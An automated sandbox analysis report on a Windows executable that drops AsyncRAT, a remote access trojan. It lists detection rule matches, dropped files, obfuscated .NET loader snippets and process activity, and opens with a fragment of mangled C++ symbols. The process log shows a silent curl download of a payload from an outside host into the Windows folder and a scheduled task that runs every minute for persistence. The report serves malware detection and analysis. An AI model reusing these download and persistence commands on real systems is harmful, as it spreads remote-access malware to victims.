std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@

0_2_00007FF77C91C0D0

Creates a window with clipboard capturing capabilities

Source: C:\Windows\StartMenuExperienceHost.exe

Window created: window name: CLIPBRDWNDCLASS

Source: sslproxydump.pcap, type: PCAP	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 12.0.StartMenuExperienceHost.exe.b30000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000C.00000000.1274279217.0000000000B32000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Windows\StartMenuExperienceHost.exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen

Source: C:\Users\user\Desktop\18sFhgSyVK.exe	Code function: 0_2_00007FF77C91C0D0	0_2_00007FF77C91C0D0
Source: C:\Users\user\Desktop\18sFhgSyVK.exe	Code function: 0_2_00007FF77C919A10	0_2_00007FF77C919A10
Source: C:\Users\user\Desktop\18sFhgSyVK.exe	Code function: 0_2_00007FF77C9121E0	0_2_00007FF77C9121E0
Source: C:\Users\user\Desktop\18sFhgSyVK.exe	Code function: 0_2_00007FF77C914350	0_2_00007FF77C914350
Source: C:\Users\user\Desktop\18sFhgSyVK.exe	Code function: 0_2_00007FF77C91FE40	0_2_00007FF77C91FE40
Source: C:\Users\user\Desktop\18sFhgSyVK.exe	Code function: 0_2_00007FF77C913660	0_2_00007FF77C913660
Source: C:\Users\user\Desktop\18sFhgSyVK.exe	Code function: 0_2_00007FF77C914E70	0_2_00007FF77C914E70
Source: C:\Windows\StartMenuExperienceHost.exe	Code function: 12_2_00007FFAAC3B24F1	12_2_00007FFAAC3B24F1
Source: C:\Windows\StartMenuExperienceHost.exe	Code function: 12_2_00007FFAAC3B6226	12_2_00007FFAAC3B6226
Source: C:\Windows\StartMenuExperienceHost.exe	Code function: 12_2_00007FFAAC3B1779	12_2_00007FFAAC3B1779
Source: C:\Windows\StartMenuExperienceHost.exe	Code function: 12_2_00007FFAAC3B6FD2	12_2_00007FFAAC3B6FD2
Source: C:\Windows\StartMenuExperienceHost.exe	Code function: 12_2_00007FFAAC3BFCA9	12_2_00007FFAAC3BFCA9
Source: C:\Windows\StartMenuExperienceHost.exe	Code function: 12_2_00007FFAAC3B10C5	12_2_00007FFAAC3B10C5
Source: C:\Windows\StartMenuExperienceHost.exe	Code function: 12_2_00007FFAAC3B2259	12_2_00007FFAAC3B2259
Source: C:\Users\user\AppData\Local\Temp\svchost.exe	Code function: 16_2_00007FFAAC3E1779	16_2_00007FFAAC3E1779
Source: C:\Users\user\AppData\Local\Temp\svchost.exe	Code function: 16_2_00007FFAAC3E10FA	16_2_00007FFAAC3E10FA
Source: C:\Users\user\AppData\Local\Temp\svchost.exe	Code function: 16_2_00007FFAAC3E2259	16_2_00007FFAAC3E2259
Source: C:\Users\user\AppData\Local\Temp\svchost.exe	Code function: 18_2_00007FFAAC3D1779	18_2_00007FFAAC3D1779
Source: C:\Users\user\AppData\Local\Temp\svchost.exe	Code function: 18_2_00007FFAAC3D10FA	18_2_00007FFAAC3D10FA
Source: C:\Users\user\AppData\Local\Temp\svchost.exe	Code function: 18_2_00007FFAAC3D2259	18_2_00007FFAAC3D2259
Source: C:\Users\user\AppData\Local\Temp\svchost.exe	Code function: 19_2_00007FFAAC3D1779	19_2_00007FFAAC3D1779
Source: C:\Users\user\AppData\Local\Temp\svchost.exe	Code function: 19_2_00007FFAAC3D10FA	19_2_00007FFAAC3D10FA
Source: C:\Users\user\AppData\Local\Temp\svchost.exe	Code function: 19_2_00007FFAAC3D2259	19_2_00007FFAAC3D2259
Source: C:\Users\user\AppData\Local\Temp\svchost.exe	Code function: 20_2_00007FFAAC3D1779	20_2_00007FFAAC3D1779
Source: C:\Users\user\AppData\Local\Temp\svchost.exe	Code function: 20_2_00007FFAAC3D10FA	20_2_00007FFAAC3D10FA
Source: C:\Users\user\AppData\Local\Temp\svchost.exe	Code function: 20_2_00007FFAAC3D2259	20_2_00007FFAAC3D2259
Source: C:\Users\user\AppData\Local\Temp\svchost.exe	Code function: 23_2_00007FFAAC3E1779	23_2_00007FFAAC3E1779
Source: C:\Users\user\AppData\Local\Temp\svchost.exe	Code function: 23_2_00007FFAAC3E10FA	23_2_00007FFAAC3E10FA
Source: C:\Users\user\AppData\Local\Temp\svchost.exe	Code function: 23_2_00007FFAAC3E2259	23_2_00007FFAAC3E2259
Source: C:\Users\user\AppData\Local\Temp\svchost.exe	Code function: 25_2_00007FFAAC3C1779	25_2_00007FFAAC3C1779
Source: C:\Users\user\AppData\Local\Temp\svchost.exe	Code function: 25_2_00007FFAAC3C10FA	25_2_00007FFAAC3C10FA
Source: C:\Users\user\AppData\Local\Temp\svchost.exe	Code function: 25_2_00007FFAAC3C2259	25_2_00007FFAAC3C2259
Source: C:\Users\user\AppData\Local\Temp\svchost.exe	Code function: 27_2_00007FFAAC3A1779	27_2_00007FFAAC3A1779
Source: C:\Users\user\AppData\Local\Temp\svchost.exe	Code function: 27_2_00007FFAAC3A10FA	27_2_00007FFAAC3A10FA
Source: C:\Users\user\AppData\Local\Temp\svchost.exe	Code function: 27_2_00007FFAAC3A2259	27_2_00007FFAAC3A2259

Source: sslproxydump.pcap, type: PCAP	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 12.0.StartMenuExperienceHost.exe.b30000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000C.00000000.1274279217.0000000000B32000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Windows\StartMenuExperienceHost.exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: StartMenuExperienceHost.exe.4.dr, CQg6RO8lWJcEYht.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: StartMenuExperienceHost.exe.4.dr, k7DEUthG3QSrccC.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: StartMenuExperienceHost.exe.4.dr, k7DEUthG3QSrccC.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: svchost.exe.12.dr, CQg6RO8lWJcEYht.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: svchost.exe.12.dr, k7DEUthG3QSrccC.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: svchost.exe.12.dr, k7DEUthG3QSrccC.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: StartMenuExperienceHost.exe.4.dr, RrgnVVd2FggAleXTu6jzSzDBhYAhkFKt0RWLUcYy.cs	Base64 encoded string: 'V3UD2FZVIi3SYqeofALEN2tiKpgIowf6nPUDeiDeIwlPDjehV4IrS02lC5sZFYwn', 'KE3+yN2URlkwJR1XJK3rEAoSCVhFQvSlcVwHbOmPvRvFNp+GqH+yR42XPJnW/LqY'
Source: svchost.exe.12.dr, RrgnVVd2FggAleXTu6jzSzDBhYAhkFKt0RWLUcYy.cs	Base64 encoded string: 'V3UD2FZVIi3SYqeofALEN2tiKpgIowf6nPUDeiDeIwlPDjehV4IrS02lC5sZFYwn', 'KE3+yN2URlkwJR1XJK3rEAoSCVhFQvSlcVwHbOmPvRvFNp+GqH+yR42XPJnW/LqY'

Source: StartMenuExperienceHost.exe.4.dr, CXI8pRDzkszq5HX6ifwmQi7CGwo84thmNTLid5H5.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: StartMenuExperienceHost.exe.4.dr, CXI8pRDzkszq5HX6ifwmQi7CGwo84thmNTLid5H5.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: svchost.exe.12.dr, CXI8pRDzkszq5HX6ifwmQi7CGwo84thmNTLid5H5.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: svchost.exe.12.dr, CXI8pRDzkszq5HX6ifwmQi7CGwo84thmNTLid5H5.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: C:\Users\user\AppData\Local\Temp\svchost.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2552:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5764:120:WilError_03
Source: C:\Windows\StartMenuExperienceHost.exe	Mutant created: \Sessions\1\BaseNamedObjects\HtJDJt7FEenilHh1
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:7848:120:WilError_03

Source: unknown	Process created: C:\Users\user\Desktop\18sFhgSyVK.exe "C:\Users\user\Desktop\18sFhgSyVK.exe"
Source: C:\Users\user\Desktop\18sFhgSyVK.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\18sFhgSyVK.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl https://r2.hypixel.cfd/svchost.exe -o C:\Windows\StartMenuExperienceHost.exe --silent
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl https://r2.hypixel.cfd/svchost.exe -o C:\Windows\StartMenuExperienceHost.exe --silent
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
Source: C:\Users\user\Desktop\18sFhgSyVK.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c color b
Source: C:\Users\user\Desktop\18sFhgSyVK.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\Windows\StartMenuExperienceHost.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\StartMenuExperienceHost.exe C:\Windows\StartMenuExperienceHost.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalService -s W32Time
Source: C:\Windows\StartMenuExperienceHost.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user~1\AppData\Local\Temp\svchost.exe"
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\svchost.exe C:\Users\user~1\AppData\Local\Temp\svchost.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\svchost.exe "C:\Users\user~1\AppData\Local\Temp\svchost.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\svchost.exe "C:\Users\user~1\AppData\Local\Temp\svchost.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\svchost.exe C:\Users\user~1\AppData\Local\Temp\svchost.exe
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\svchost.exe C:\Users\user~1\AppData\Local\Temp\svchost.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\svchost.exe C:\Users\user~1\AppData\Local\Temp\svchost.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\svchost.exe C:\Users\user~1\AppData\Local\Temp\svchost.exe
Source: C:\Users\user\Desktop\18sFhgSyVK.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl https://r2.hypixel.cfd/svchost.exe -o C:\Windows\StartMenuExperienceHost.exe --silent	Jump to behavior
Source: C:\Users\user\Desktop\18sFhgSyVK.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c color b	Jump to behavior
Source: C:\Users\user\Desktop\18sFhgSyVK.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\Windows\StartMenuExperienceHost.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl https://r2.hypixel.cfd/svchost.exe -o C:\Windows\StartMenuExperienceHost.exe --silent	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\StartMenuExperienceHost.exe C:\Windows\StartMenuExperienceHost.exe	Jump to behavior
Source: C:\Windows\StartMenuExperienceHost.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user~1\AppData\Local\Temp\svchost.exe"	Jump to behavior

Source: 18sFhgSyVK.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 18sFhgSyVK.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 18sFhgSyVK.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 18sFhgSyVK.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 18sFhgSyVK.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 18sFhgSyVK.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 18sFhgSyVK.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 18sFhgSyVK.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 18sFhgSyVK.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 18sFhgSyVK.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 18sFhgSyVK.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: StartMenuExperienceHost.exe.4.dr, FntRTCv7ZktbuAMyNaiZ3ivt9bwnGTHU0c1lHAs936cKmGjarAqBsIBDwBugWGcfu8uAIkoE.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{RrgnVVd2FggAleXTu6jzSzDBhYAhkFKt0RWLUcYy.tM3bvFnn6Mbt5WifsvxJGCRJaGCs9xZx7ZGfykhl,RrgnVVd2FggAleXTu6jzSzDBhYAhkFKt0RWLUcYy._3769zkLfcwVNUIC9LIejrz9yUfAKE6U1Ph3o3QGC,RrgnVVd2FggAleXTu6jzSzDBhYAhkFKt0RWLUcYy.Oxyq8pdntw8n8wlgK4cC1UviEbCs6cWoFWExp6r1,RrgnVVd2FggAleXTu6jzSzDBhYAhkFKt0RWLUcYy.qkxNRIW066TVI4rVu5JkoNIJP7mcZDkeuXbO8Bdo,k7DEUthG3QSrccC.xEDeLKp11QUlOfC()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: StartMenuExperienceHost.exe.4.dr, FntRTCv7ZktbuAMyNaiZ3ivt9bwnGTHU0c1lHAs936cKmGjarAqBsIBDwBugWGcfu8uAIkoE.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{_6uAygstEjpWYqFVRDShR2PLcfPk0CM4htkRpQYutB8HqFsvC8V7WWEeCqyXPAOkfLEh39tNV[2],k7DEUthG3QSrccC.vWTlVsnh1Kh1jPA(Convert.FromBase64String(_6uAygstEjpWYqFVRDShR2PLcfPk0CM4htkRpQYutB8HqFsvC8V7WWEeCqyXPAOkfLEh39tNV[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: svchost.exe.12.dr, FntRTCv7ZktbuAMyNaiZ3ivt9bwnGTHU0c1lHAs936cKmGjarAqBsIBDwBugWGcfu8uAIkoE.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{RrgnVVd2FggAleXTu6jzSzDBhYAhkFKt0RWLUcYy.tM3bvFnn6Mbt5WifsvxJGCRJaGCs9xZx7ZGfykhl,RrgnVVd2FggAleXTu6jzSzDBhYAhkFKt0RWLUcYy._3769zkLfcwVNUIC9LIejrz9yUfAKE6U1Ph3o3QGC,RrgnVVd2FggAleXTu6jzSzDBhYAhkFKt0RWLUcYy.Oxyq8pdntw8n8wlgK4cC1UviEbCs6cWoFWExp6r1,RrgnVVd2FggAleXTu6jzSzDBhYAhkFKt0RWLUcYy.qkxNRIW066TVI4rVu5JkoNIJP7mcZDkeuXbO8Bdo,k7DEUthG3QSrccC.xEDeLKp11QUlOfC()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: svchost.exe.12.dr, FntRTCv7ZktbuAMyNaiZ3ivt9bwnGTHU0c1lHAs936cKmGjarAqBsIBDwBugWGcfu8uAIkoE.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{_6uAygstEjpWYqFVRDShR2PLcfPk0CM4htkRpQYutB8HqFsvC8V7WWEeCqyXPAOkfLEh39tNV[2],k7DEUthG3QSrccC.vWTlVsnh1Kh1jPA(Convert.FromBase64String(_6uAygstEjpWYqFVRDShR2PLcfPk0CM4htkRpQYutB8HqFsvC8V7WWEeCqyXPAOkfLEh39tNV[3]))}}, (string[])null, (Type[])null, (bool[])null, true)

Source: StartMenuExperienceHost.exe.4.dr, FntRTCv7ZktbuAMyNaiZ3ivt9bwnGTHU0c1lHAs936cKmGjarAqBsIBDwBugWGcfu8uAIkoE.cs	.Net Code: CQN4IzuYh6n5hW0DT5CXNjlmgQqGp0FQw5BTdVkNg8hnfElRcRaeHbBkrnFuMbes2eJ5RuKT System.AppDomain.Load(byte[])
Source: StartMenuExperienceHost.exe.4.dr, FntRTCv7ZktbuAMyNaiZ3ivt9bwnGTHU0c1lHAs936cKmGjarAqBsIBDwBugWGcfu8uAIkoE.cs	.Net Code: VKBoLhBkQ3Oc29IeoWXz0kc5bvaSAPm1P1AjrxLpWxBXkVKLRal0OjsbHNKpPe6krcQNY5Ud System.AppDomain.Load(byte[])
Source: StartMenuExperienceHost.exe.4.dr, FntRTCv7ZktbuAMyNaiZ3ivt9bwnGTHU0c1lHAs936cKmGjarAqBsIBDwBugWGcfu8uAIkoE.cs	.Net Code: VKBoLhBkQ3Oc29IeoWXz0kc5bvaSAPm1P1AjrxLpWxBXkVKLRal0OjsbHNKpPe6krcQNY5Ud
Source: svchost.exe.12.dr, FntRTCv7ZktbuAMyNaiZ3ivt9bwnGTHU0c1lHAs936cKmGjarAqBsIBDwBugWGcfu8uAIkoE.cs	.Net Code: CQN4IzuYh6n5hW0DT5CXNjlmgQqGp0FQw5BTdVkNg8hnfElRcRaeHbBkrnFuMbes2eJ5RuKT System.AppDomain.Load(byte[])
Source: svchost.exe.12.dr, FntRTCv7ZktbuAMyNaiZ3ivt9bwnGTHU0c1lHAs936cKmGjarAqBsIBDwBugWGcfu8uAIkoE.cs	.Net Code: VKBoLhBkQ3Oc29IeoWXz0kc5bvaSAPm1P1AjrxLpWxBXkVKLRal0OjsbHNKpPe6krcQNY5Ud System.AppDomain.Load(byte[])
Source: svchost.exe.12.dr, FntRTCv7ZktbuAMyNaiZ3ivt9bwnGTHU0c1lHAs936cKmGjarAqBsIBDwBugWGcfu8uAIkoE.cs	.Net Code: VKBoLhBkQ3Oc29IeoWXz0kc5bvaSAPm1P1AjrxLpWxBXkVKLRal0OjsbHNKpPe6krcQNY5Ud

Source: StartMenuExperienceHost.exe.4.dr, YuWwnU774i1WXQz.cs	High entropy of concatenated method names: 'zoPwAT5CIxrIHgi', 'FKGpPlnraXbM1ZF', 'jXiKhZ2WRX9rqip', '_4YgkMx1W2VQBhkBo9H', 'Mtx16zRUzpofifFREl', 'vftrbwcfQzEo1ZL9A3', '_7PBY7FZQF55DjK1Cov', 'TLX2HhdljB2mEAtMSY', 'MIewFAlfiNh37TUukE', 'VlvzphW9ZDbWXg1odi'
Source: StartMenuExperienceHost.exe.4.dr, BYZXqCcInfvLxkJ.cs	High entropy of concatenated method names: 'HmYB37sUGn1tzWo', 'SwJtMaiww3xwhlt', '_2Ncrum7fWL0LZSI3UTXJdSgAbrxu50NP', 'KJck06XP8a2RC4x3RbNNtnEWeVWVU5RK', 'o2ayMkAsm2MJl7DzCGVCewxkkEXGw9pv', 'XsgoBl2zFUtxhxO7iFYbTblPAMzBMdo8'
Source: StartMenuExperienceHost.exe.4.dr, vxw6fPaLgCWKUy0.cs	High entropy of concatenated method names: 'bsRhaVEy8neLH0G', 'gQeMuKYZfmdfalx', 'a8ZGWF4Ze61pADc', 'BPZ5AL5H8T2eyhW', 'cIvhfw92JPAMmOxZlGFpa6dJWdcGwybE', 'xp2ouzuaCyVa0e3eVHsOzzb0qWY8YtLE', 'ESgVaOnZruQgSXv7dUJbyII9HmUzzpcM', 'lmYfT7g04ToPYZcDY8skWi5KCol1VIKc', 'AfqADcwUoxdRdfpzT2f6Gr6do4dtwHRR', 'WWL0XENC3bSs0kDawIY7qmuVJ47WHNcZ'
Source: StartMenuExperienceHost.exe.4.dr, 4YsgSk8wbMoiiRy.cs	High entropy of concatenated method names: 'AddClipboardFormatListener', 'SetParent', 'kaAfXKhhGgwVbpY', 'ZuyftoEJOIUteV19hRJzXvsttxsbIVQE', 'FXMAjIdHzuejPKublxja7znJenaoewZ4', 'THmHOhpw81AE8MOOZCRn7a0aYF6RPxJZ', 'PEC4vmGtLYWCB1RoZF9K5OzyWH2kigrV'
Source: StartMenuExperienceHost.exe.4.dr, RGgnftDWPPpsIjGTcvO1OpP8vWPkDEV58d5cxkAlUabCGJ3GABiiQ81jRyxmvPvrtAm4lXCj.cs	High entropy of concatenated method names: 'ORiC8emOPRQGOXpPv83ulthuW6CVQ6YM4xTAjZ2jPRAoP9wiEOfLSrtcMcVNycVBuUDSk2rB', 'AceLNnYLfssv5xNkhIBxOpI2MxBiQXzE', 'krotEk14oyz0ZE7dRR97UUit8vJqRAkB', 'kRUj6xBlZyurP2lRnqqZjyfmGywk0gbR', 'xsPGLSQ1yo77J0S7jujyES9FLI86EBg1'
Source: StartMenuExperienceHost.exe.4.dr, XqLRt2iKMxTUA2h4rXCpIUvAUqRYRR5QrACB1BMG.cs	High entropy of concatenated method names: 'l6xBdqb0bhFOmil6dHylKViFfsdgGKvRJk6esdwo', 'SNU29fbBoCjckaVAB9UgMQV0JgKVgsN6yzd6huJ3', 'qc88vInX2XwZwshFbCgXe3OVAw7r9h3qu6VvVOyz', 'Vlcok3h04GLc88cDOnru26nx5ciYbJJaxeObu95U', '_7fyohtCQd9HltSGvlCh4tY4hXjO9K4W56xjZOh0y', 'FYvEJEAauCvrzK4SAEAXEftUcg1Y3DLHHy84Q6E4', 'P8qnLG95P6quuFElwnzpmvpx1UFiMYwaN0X3Tl5f', 'TdTY4rZk0TCcYFml7X4XfCA4ztEWOTb43FyTMja1', 'Qq5pVkiqLGsEZ5anpF0Ym6XKaLY63thUytWoxwSR', 'Jfmk5g6q8jjPsHj0gP4kKAcor9y15M3BKKlOda82'
Source: StartMenuExperienceHost.exe.4.dr, 2ZsuPbqCBQvbqJJvnkg9IdlWfbr0LmDXH0wXVeMuDAdpKCo8t7EgBvOlnRI4Spu7Koww44lw.cs	High entropy of concatenated method names: 'OBy0ZRAIl27FCEGiYcN9v20B0ApQ6svlHIBlVvq7GViELUIicS9JbY2KMhq58KS9Knd8QBm8', 'vW3Z6eetIFV12B3ix3zdScvW81U6867oGrNe5wk2zZIiVJpIgd0gNvOZvz5vc5nkoDupLdG7', 'AfmZWlx8we4jinH1fpygtayywMwVfzIlMlUkX2BWNgIggiHReOyZCL6zks0UqQOiDCp0DRkI', 'a6IeH8rYFq5qZ30UJiPfTxhDwk66gTOJDXy1aK69WuyJ5hrDX52lC233ac3SOAsBs5g40You', 'CK0cM9yaSZQZ7inxdCslngKIXOLY9Et7yOmvKcyz2q9Wnbk7ZP2yJtQqacaPMLRTvUR0xOv5', 'mhzDKktfAFZgNabYnqjDgO0cu8f6bsRW9Jj6QRvG8K2ls65zW5v9MOb72oauprJMj9Gd4A84', 'CjEQcs6fYlnaFXk0b70e9C47jALT8MEiWlYjpuH9xOvSnYuWuewRnrpWUtSxBQObqChDzpAl', 'ycr9eocoI9ydvfkVn6vo1JrLKfJrUZupOceBW2NqwfXuCZokg05vIMiQuVvyjpRR0fSkWERq', 'klc47EgajQ5XpcbHKWaHrsg8gMtxxevNa6VI6lKeWZaWzl3IR9xs5BUHO7epHk3p4ulIgkz9', 'uX324uFDfb1twezydRxB4KiQLijU68Yegli535SbeNvVPGE7Xp5fffHy8gP84lIHUygonIVm'
Source: StartMenuExperienceHost.exe.4.dr, FntRTCv7ZktbuAMyNaiZ3ivt9bwnGTHU0c1lHAs936cKmGjarAqBsIBDwBugWGcfu8uAIkoE.cs	High entropy of concatenated method names: 'GvngXKg6lLmy5vBBHSIzLkyqFBS6K9rdghWoJ7tDAXccsi5qovHalv8i7XgquXawMbM1XU9l', 'CQN4IzuYh6n5hW0DT5CXNjlmgQqGp0FQw5BTdVkNg8hnfElRcRaeHbBkrnFuMbes2eJ5RuKT', 'JXsDlFCsoB8yBkNQYyxgMmj4evDB48lW49wM1d961DQ9pcCWsGJkVCfTIart3WCT8opHL9uO', '_0vFa2dvnZUAKRVobWqAPtd0ly2YwziIbyyB0PzJ6fbIZPMhwRabsAfUKxjEBN4MGScvTHloB', '_8KUyxFtwan6UXk4kxwDH1xBAWmZc5UKkz4dvjelYE5TcImdSrKy13wRisPMNEr3L4aPBglyq', 'c8FaDnpWxHYsYI1B2daqv7tsym5SfFGRdcBU5yqFDFGueYlDC8PN3nnkqprMYkHLdPSh9mdX', 'VizLtxeppd42kEqbbvfx4oohKXA4LvFFjm0at7tlVraTFTOW1gBDSuVwE46rD5txVKdyT0dY', 'YWKd05bA2ZBL4jKDtELGLuGXpd4MlJ7PAij6Vk0WVLCm61Yja0VeokNUy12ckNEmsINakcdE', 'lMluw0ZsmqwdPD3wI8oYS2YDmg29UpJctqjvby0Di97UuxjK6w7f9BIDryX8Qvs5kMATj3lj', '_2gmJrYMIeqZZvfYyKnN6sXqTyj34Q0QLieSDM4TpwsCtPS9le2aXAgPtdMdXTlfcjOpNyawl'
